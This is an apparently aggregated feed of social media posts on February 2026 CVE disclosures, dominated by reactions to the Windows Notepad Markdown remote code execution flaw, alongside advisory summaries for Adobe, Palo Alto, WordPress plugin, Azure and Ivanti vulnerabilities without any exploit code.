- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##updated 2026-02-11T17:37:39.147000
2 posts
🟠 CVE-2026-21320 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21320 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:37:04.913000
2 posts
🟠 CVE-2026-21323 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21323 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:36:45.697000
2 posts
🟠 CVE-2026-21324 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21324/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21324 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21324/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:35:50.863000
2 posts
🟠 CVE-2026-21328 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21328/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21328 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21328/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:16:03.557000
2 posts
🟠 CVE-2026-21343 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21343/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21343 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21343/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:15:14.187000
2 posts
🟠 CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T16:16:03.583000
1 posts
🚨 CVE-2026-1235: CRITICAL deserialization flaw in WP eCommerce (≤3.15.1) allows unauthenticated PHP object injection via AJAX. No patch yet. Disable vulnerable AJAX actions & audit plugins. High risk for EU e-commerce sites. https://radar.offseq.com/threat/cve-2026-1235-cwe-502-deserialization-of-untrusted-67de3834 #OffSeq #WordPress #Security
##updated 2026-02-11T15:16:16.997000
100 posts
3 repos
https://github.com/BTtea/CVE-2026-20841-PoC
@mttaggart for those utilizing MS defender stack here is a detection for it:
https://github.com/0x-cde/Threat-Hunting-with-KQL/blob/main/Queries/CVE-2026-20841.md
⚠️ Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network
##moves.
- TikTok launches opt-in Local Feed in the US using precise location data.
- Windows Notepad remote code execution vulnerability CVE-2026-20841.
- Europe’s hypersonic program: Mach 6 test completed in Norway as defense autonomy advances. [2/2]
https://winbuzzer.com/2026/02/11/microsoft-patches-notepad-rce-vulnerability-cve-2026-20841-xcxwbn/
Microsoft Patches High-Severity Notepad Remote Code Execution Flaw
#Cybersecurity #MicrosoftNotepad #Microsoft #Windows #MicrosoftWindows #Windows11 #PatchTuesday #SecurityPatches #WindowsVulnerability #Vulnerability
##Here's my CVE-2026-20841 PoC.
(Not really, but I have a feeling it's something that rhymes with this)
##The Vibe-coding Era at Microsoft is going greaaaaaaaat.... https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Looks like the vibe coders at Microsoft forgot to add "don't introduce command injection vulnerabilities" to their prompts?
##🔥 Notepad colpito da vulnerabilità critica
Notepad in Windows 11 espone milioni di PC a un attacco remoto: la vulnerabilità CVE-2026-20841 sfrutta il supporto Markdown per eseguire codice malevolo con un semplice clic su un link
https://gomoot.com/notepad-di-windows-11-colpito-da-vulnerabilita-critica/
##Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Imagine being jail to an operating system where even the blast editor is vulnerable
Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
https://www.cve.org/CVERecord?id=CVE-2026-20841
Keep contributing and funding alternatives for all of us.
##Notepad++: alcune mie versioni erano vulnerabili
MS Notepad: hold my beer
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability https://lobste.rs/s/kp7jlq #windows
https://www.cve.org/CVERecord?id=CVE-2026-20841
Remote Code Execution on notepad
FUCKING NOTEPAD
Microsoft, keep your claws out of the working code! Notepad does NOT need upgrades to be anything else than an entirely plain text editor.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Just A+ work all around.
"Windows Notepad App Remote Code Execution Vulnerability"
##Falha crítica no Bloco de notas (CVE-2026-20841). Um invasor poderia colocar um link malicioso em um arquivo Markdown que, ao ser clicado pela vítima, executaria códigos remotamente. Quem mandou macular a simplicidade do Bloco de notas? Já tem correção disponível. https://www.cve.org/CVERecord?id=CVE-2026-20841&utm_medium=social&utm_source=manualdousuario
##Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##1976:
In fünfzig Jahren werden wir fliegende Autos haben.
2026:
Schwere Sicherheitslücke in ... Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Что ни день, то повод посмеяться над микрослопом.
Была обнаружена уязвимость, которая позволяет злоумышленникам запускать произвольный код на компьютере жертвы через БЛОКНОТ, сука. Серьёзность уязвимости помечена как ВЫСОКАЯ
##Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Notepad.exe RCE Vulnerability 8.8
Are you shitting me?
Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Notepad... NOTEPAD!
CVE Record: CVE-2026-20841
##What the.. how?
Notepad was the simplest application on windows. What have they done to it?
##Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.
##Notepad RCE? https://cvefeed.io/vuln/detail/CVE-2026-20841
##lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.
plus remote code execution in fucking Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Comments: https://news.ycombinator.com/item?id=46971516
lol
Windows Notepad App Remote Code Execution Vulnerability
##📜 Latest Top Story on #HackerNews: Windows Notepad App Remote Code Execution Vulnerability
🔍 Original Story: https://www.cve.org/CVERecord?id=CVE-2026-20841
👤 Author: riffraff
⭐ Score: 63
💬 Number of Comments: 12
🕒 Posted At: 2026-02-11 06:15:33 UTC
🔗 URL: https://news.ycombinator.com/item?id=46971516
#news #hackernewsbot #bot #hackernews
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
#Windows #sécurité
Oh misère, y'a même des failles RCE dans le Notepad de Windows ???
https://www.cve.org/CVERecord?id=CVE-2026-20841
Windows Notepad App Remote Code Execution Vulnerability - https://www.cve.org/CVERecord?id=CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
##Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to “Windows Notepad App Remote Code Execution Vulnerability”.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Microsoft: I have made Notepad✨
Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.
##They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.
This CVE is an 8.8 severity RCE in Notepad of all things lmao.
Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.
We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? 😭
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology
##What is it, Microsoft shited their pants again lol :neofox_laugh_tears:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
Even this page didn't load properly :neofox_laugh_tears:
#Microsoft #windows
@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.
Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841
microsoft: we have made a new notepad.exe
everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.
##CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."
lolwut
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##someone earlier today said "RCE in Notepad" and i was like "haha funny" and then someone ELSE said RCE in Notepad and then i was like youve gotta be fucking kidding me
##Kein Kommentar. Wäre nicht zitierfähig. Aber...
RCE im Notizblock?! Wie verstrahlt- uhm "vibed" ist das denn?!
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##https://www.cve.org/CVERecord?id=CVE-2026-20841
##Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
Notepad
over a network
Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.
https://www.cve.org/CVERecord?id=CVE-2026-20841
It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.
##RE: https://tech.lgbt/@solonovamax/116049115040950367
https://www.cve.org/CVERecord?id=CVE-2026-20841
WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD
WHAT BIT COULD IT BEEEEEEEE
edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.
##"Windows Notepad App Remote Code Execution Vulnerability"
That's it: I'm going back to AppleWorks, on my Apple IIe.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##@m4rc3l CVE-2026-20841 #c3d2leaks
##From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad 🤦♂️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
@mttaggart for those utilizing MS defender stack here is a detection for it:
https://github.com/0x-cde/Threat-Hunting-with-KQL/blob/main/Queries/CVE-2026-20841.md
⚠️ Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network
##https://winbuzzer.com/2026/02/11/microsoft-patches-notepad-rce-vulnerability-cve-2026-20841-xcxwbn/
Microsoft Patches High-Severity Notepad Remote Code Execution Flaw
#Cybersecurity #MicrosoftNotepad #Microsoft #Windows #MicrosoftWindows #Windows11 #PatchTuesday #SecurityPatches #WindowsVulnerability #Vulnerability
##Here's my CVE-2026-20841 PoC.
(Not really, but I have a feeling it's something that rhymes with this)
##The Vibe-coding Era at Microsoft is going greaaaaaaaat.... https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##🔥 Notepad colpito da vulnerabilità critica
Notepad in Windows 11 espone milioni di PC a un attacco remoto: la vulnerabilità CVE-2026-20841 sfrutta il supporto Markdown per eseguire codice malevolo con un semplice clic su un link
https://gomoot.com/notepad-di-windows-11-colpito-da-vulnerabilita-critica/
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Imagine being jail to an operating system where even the blast editor is vulnerable
Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
https://www.cve.org/CVERecord?id=CVE-2026-20841
Keep contributing and funding alternatives for all of us.
##Windows Notepad App Remote Code Execution Vulnerability https://lobste.rs/s/kp7jlq #windows
https://www.cve.org/CVERecord?id=CVE-2026-20841
Remote Code Execution on notepad
FUCKING NOTEPAD
Microsoft, keep your claws out of the working code! Notepad does NOT need upgrades to be anything else than an entirely plain text editor.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Just A+ work all around.
"Windows Notepad App Remote Code Execution Vulnerability"
##Falha crítica no Bloco de notas (CVE-2026-20841). Um invasor poderia colocar um link malicioso em um arquivo Markdown que, ao ser clicado pela vítima, executaria códigos remotamente. Quem mandou macular a simplicidade do Bloco de notas? Já tem correção disponível. https://www.cve.org/CVERecord?id=CVE-2026-20841&utm_medium=social&utm_source=manualdousuario
##1976:
In fünfzig Jahren werden wir fliegende Autos haben.
2026:
Schwere Sicherheitslücke in ... Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Что ни день, то повод посмеяться над микрослопом.
Была обнаружена уязвимость, которая позволяет злоумышленникам запускать произвольный код на компьютере жертвы через БЛОКНОТ, сука. Серьёзность уязвимости помечена как ВЫСОКАЯ
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Notepad.exe RCE Vulnerability 8.8
Are you shitting me?
Notepad... NOTEPAD!
CVE Record: CVE-2026-20841
##What the.. how?
Notepad was the simplest application on windows. What have they done to it?
##Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.
##Notepad RCE? https://cvefeed.io/vuln/detail/CVE-2026-20841
##lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.
plus remote code execution in fucking Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Comments: https://news.ycombinator.com/item?id=46971516
lol
Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
#Windows #sécurité
Oh misère, y'a même des failles RCE dans le Notepad de Windows ???
https://www.cve.org/CVERecord?id=CVE-2026-20841
Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
##Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to “Windows Notepad App Remote Code Execution Vulnerability”.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Microsoft: I have made Notepad✨
Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.
##They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.
This CVE is an 8.8 severity RCE in Notepad of all things lmao.
Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.
We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? 😭
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology
##@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.
Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841
microsoft: we have made a new notepad.exe
everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.
##CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."
lolwut
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##https://www.cve.org/CVERecord?id=CVE-2026-20841
##Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
Notepad
over a network
Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.
https://www.cve.org/CVERecord?id=CVE-2026-20841
It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.
##RE: https://tech.lgbt/@solonovamax/116049115040950367
https://www.cve.org/CVERecord?id=CVE-2026-20841
WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD
WHAT BIT COULD IT BEEEEEEEE
edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.
##"Windows Notepad App Remote Code Execution Vulnerability"
That's it: I'm going back to AppleWorks, on my Apple IIe.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##@m4rc3l CVE-2026-20841 #c3d2leaks
##From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad 🤦♂️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
updated 2026-02-11T09:30:25
1 posts
1 repos
https://github.com/Z3YR0xX/CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0
⚠️ HIGH severity: CVE-2026-1560 in Lazy Blocks (WordPress, ≤4.2.0) lets Contributor+ users run arbitrary code via improper code generation (CWE-94). No public exploits yet — restrict roles and monitor activity! https://radar.offseq.com/threat/cve-2026-1560-cwe-94-improper-control-of-generatio-655d2091 #OffSeq #WordPress #RCE #Vuln
##updated 2026-02-11T06:30:48
2 posts
2 repos
🚨 CRITICAL: CVE-2026-1357 impacts WPvivid Backup & Migration (all versions). Unauthenticated file upload via directory traversal enables RCE. Disable plugin or restrict access immediately! https://radar.offseq.com/threat/cve-2026-1357-cwe-434-unrestricted-upload-of-file--8f35918d #OffSeq #WordPress #Infosec #CVE20261357
##A critical arbitrary file upload vulnerability (CVE-2026-1357, CVSS 9.8) was discovered in the WPvivid Backup & Migration plugin, which is installed on over 800,000 WordPress sites.
The flaw allows unauthenticated attackers to upload arbitrary files, potentially achieving remote code execution and full site takeover.
Update to version 0.9.124. Wordfence Premium users received firewall protection on January 22.
##updated 2026-02-10T21:51:48.077000
3 posts
🚨 CVE-2026-21531: Critical RCE in Azure AI Language Authoring SDK v1.0.0 via deserialization of untrusted data. Unauthenticated attackers can execute code remotely. Restrict access & monitor endpoints until patched. https://radar.offseq.com/threat/cve-2026-21531-cwe-502-deserialization-of-untruste-4a5578f9 #OffSeq #Azure #Security
##🔴 CVE-2026-21531 - Critical (9.8)
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-21531 - Critical (9.8)
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21246 - High (7.8)
Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21246 - High (7.8)
Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21257 - High (8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21257 - High (8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21537 - High (8.8)
Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21537 - High (8.8)
Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-25992 - High (7.5)
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25992/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25992 - High (7.5)
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25992/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
